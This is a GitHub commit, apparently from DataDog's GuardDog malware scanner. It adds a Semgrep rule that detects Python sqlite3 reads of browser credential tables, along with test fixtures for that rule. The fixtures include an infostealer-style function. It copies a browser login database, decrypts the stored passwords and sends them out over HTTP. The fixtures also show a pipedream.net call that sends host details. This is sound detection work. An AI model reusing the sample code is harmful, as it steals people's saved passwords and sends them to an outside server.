Add detection for Python sqlite3 data exfiltration (#420)

* Add Python sqlite3 data exfiltration rule coverage * Incorporate change requests * Match only on targeted table names
DataDog · Jul 19, 2024 · 8545867 · 8545867
1 parent 104e883
commit 8545867
Show file tree

Hide file tree

Showing 2 changed files with 35 additions and 0 deletions.
diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -31,6 +31,18 @@ rules:
           - metavariable-regex:
               metavariable: $ENVVAR
               regex: ([\"\'](AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN)[\"\'])
+      - patterns:
+          - pattern-inside: |
+              $CONNECT = sqlite3.connect(...)
+              ...
+              $CURSOR = $CONNECT.cursor(...)
+              ...
+          - pattern: $CURSOR.execute($QUERY, ...)
+          - metavariable-pattern:
+              metavariable: $QUERY
+              patterns:
+                - pattern: "..."
+                - pattern-regex: (?i)(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)
     pattern-sinks:
       - pattern-either:
           - pattern-inside: requests.$METHOD(...)

diff --git a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
@@ -226,3 +226,26 @@ def run(self):
         ploads = {'hostname':hostname,'cwd':cwd,'username':username}
         # ruleid: exfiltrate-sensitive-data
         requests.get("https://eo6ksiuyau5e5x2.m.pipedream.net",params = ploads)
+
+
+""" RULEID: sqlite3 data exfiltration
+"""
+
+def steal_passwords2(self, name: str, path: str, profile: str):
+    path = "path"
+    if not os.path.isfile(path):
+        return
+    loginvault = self.random_dir_create()
+    copy2(path, loginvault)
+    conn = sqlite3.connect(loginvault)
+    cursor = conn.cursor()
+    with open(os.path.join(self.dir, "Browsers", "All Passwords.txt"), 'a', encoding="utf-8") as f:
+        for res in cursor.execute("SELECT origin_url, username, password_value FROM logins").fetchall():
+            url, username, password = res
+            password = self.dcrpt_val(password, self.masterkey)
+            if url != "":
+                params = {'url': url, 'username': username, 'password': password}
+                # ruleid: exfiltrate-sensitive-data
+                requests.get("https://example.com", params=params)
+    cursor.close()
+    conn.close()